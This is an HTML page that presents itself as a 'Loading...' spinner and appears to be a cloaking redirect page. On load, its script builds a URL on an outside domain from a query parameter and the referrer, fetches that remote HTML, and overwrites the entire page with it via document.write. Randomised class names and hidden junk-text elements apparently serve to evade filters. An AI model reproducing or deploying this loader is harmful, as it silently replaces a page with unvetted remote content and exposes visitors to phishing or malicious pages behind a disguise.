<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zI8oRzWToQ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zI8oRzWToQ .yfpvP3f9JbP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zI8oRzWToQ .content {
            line-height: 50px;
            text-align: center
        }

        .zI8oRzWToQ .img {
            width: 100%
        }

        .zI8oRzWToQ .aLUycq {
            text-align: center
        }

        .zI8oRzWToQ .aLUycq span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zI8oRzWToQ .aLUycq span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zI8oRzWToQ .aLUycq span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zI8oRzWToQ .aLUycq span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zI8oRzWToQ .aLUycq span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zI8oRzWToQ .aLUycq span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zI8oRzWToQ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function nkv7FD6Jjt(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dFlI2B = nkv7FD6Jjt('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dFlI2B +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dFlI2B +".html?a=share";
		}
		
        yttJNCEg9=url+"#"+new Date().getTime();
        yttJNCEg9 && function() {
            $.get(yttJNCEg9, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >rFRzlqI5SWcZwKDvaIH4pru8KGzGNNS8aILd7Rr8JXF4YvrG1nG8Gcnh3V2Rq2IfGDl3JSUo</h1>
<h1 style='display:none' >rFRzlqI5SWcZwKDvaIH4pru8KGzGNNS8aILd7Rr8JXF4YvrG1nG8Gcnh3V2Rq2IfGDl3JSUo</h1>
<a  href='#' style='display:none'>ZQeQDL5cH0lqA3WM</a><div class="zI8oRzWToQ">
    <div class="yfpvP3f9JbP">
        <div class="aLUycq">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>cWX1aBTRAxg0CpkoqQTx8ijGxS3H</span>
<span style='display:none'>cWX1aBTRAxg0CpkoqQTx8ijGxS3H</span>
<p  style='display:none'>lULq2VKC7dfupsdigKep6SjHqS7U411MefKVtgDnmNPCtseZD7tkqxtPlouDozSQh2rAISzuHNsz1Dly</p>
<a  href='#' style='display:none'>Lo0LvcMVNwWAHlXKy1OWsys0tc4Y4qNjYja3q6RKn1ZHZpeVJEq299p</a>
<li style='display:none' >bOKNaizkru80g5N0KN1BYTp9nwTGmWTmYUKujsZ6g</li></body>
</html>